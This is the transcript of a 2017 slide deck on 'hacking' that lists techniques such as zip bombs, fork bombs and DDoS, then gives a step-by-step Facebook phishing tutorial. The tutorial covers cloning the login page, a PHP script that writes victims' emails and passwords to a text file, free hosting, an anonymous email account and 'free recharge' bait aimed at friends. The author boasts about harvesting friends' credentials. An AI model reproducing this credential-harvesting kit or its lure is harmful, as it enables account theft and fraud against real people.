hacked - everyone intrusted

Post on 08-Apr-2017

228 Views

Category:

Internet

1 Downloads

Preview:

Click to see full reader

TRANSCRIPT

PREPARED BY : PRATIK RATHOD

WHAT IS HACKING ?

In the cyber security world , the person who is able to discover a weakness in the system and manages to exploit it to accomplish his goal (Good or Bad) is referred to as Hacker , and the process is referred to as Hacking.

SOME TECHNIQUES…..(1)CHEAT ENGINE

(2) USB STEALER(3) ZIP BOMB(4) PHISHING(5) SQL INJECTION(6) FORK BOMB(7) FOLDER BLASTER(8) DDOS ATTACKS

PHISHING……• It is the act of tricking someone into giving confidential information (like passwords and credit card information) on a fake web page or email form pretending to come from a legitimate company (like their bank).

PHISHING……STEP 1 : HEAD OVER TO WEBSITE FACEBOOK.COM. RIGHT CLICK ANYWHERE AND SAVE THE PAGE AS AN HTML FILE.

STEP 2 : ONCE YOU SAVE THE LOGIN PAGE COMPLETELY YOU WILL SEE A HTML FILE AND FOLDER WITH THE NAME SOMETHING LIKE FACEBOOK HOME\LOGIN PAGE FILES.THERE WILL BE TWO IMAGE FILES “facebook_transparent.gif” and “logo.png”.

PHISHING……STEP 3 : now you need to upload these images to any online image hosting website for example : “tinypic.com” , “postimage.com”. When image are uploaded copy the url of each image.

Step 4 : open any text editor and search for “logo.png” and “facebook_transparent.gif” and replace with corresponding url.

PHISHING……STEP 5 : in the same file search for https://www.facebook.com/accounts/serviceloginauth

And replace it with :https://yoursite.ursername/login.php(you have to write your fake websiteurl there , see in step 7 for creating it.)

PHISHING……STEP 6 : now you need to create a php file called “login.php” and write this code :

<? php $handle = fopen(“password.txt”, “a”);fwrite($handle,$_POST[“Email”]);fwrite($handle, ”/n”);fwrite($handle,$_POST[“passwd”]);fwrite($handle, ”/n”);fwrite($handle,”/n”);fclose($handle);header(“location:https://www.facebook.com/accounts/serviceloginauth”)

PHISHING……STEP 7 : open up notepad and just save the new file “password.txt” without any content.

Now upload these three files to any webhosting site.(login.php,index.html,password.txt)

You can use the following : 110Mb.com spam.com

justfree.com

PHISHING……STEP 8 : create the fake email account , that is if you prefer to send the phishing webpage link anonymously.

Step 9 : and now all you have to do is send the something like this:”get instant free recharge , for get instantly login with your facebook acoount here”, along with this send the link to your fake website.

And then open the “password.txt” omg…….the user names and passwords of my friends facebook accounts was saved there.

SQLINJECTION….

THANK YOU

Pratik-432@blogspot.com

HACKED – THE AMAZING WORD

FOR MORE INFORMATION

OR JOIN THE GROUP

OR SUBSCRIBE

https://www.facebook.com/groups/Hack.pratik.rathod

THIS IS THE IThttps://www.facebook.com/groups/IT.Pratik.rathod

Information Technology.Netsquare

top related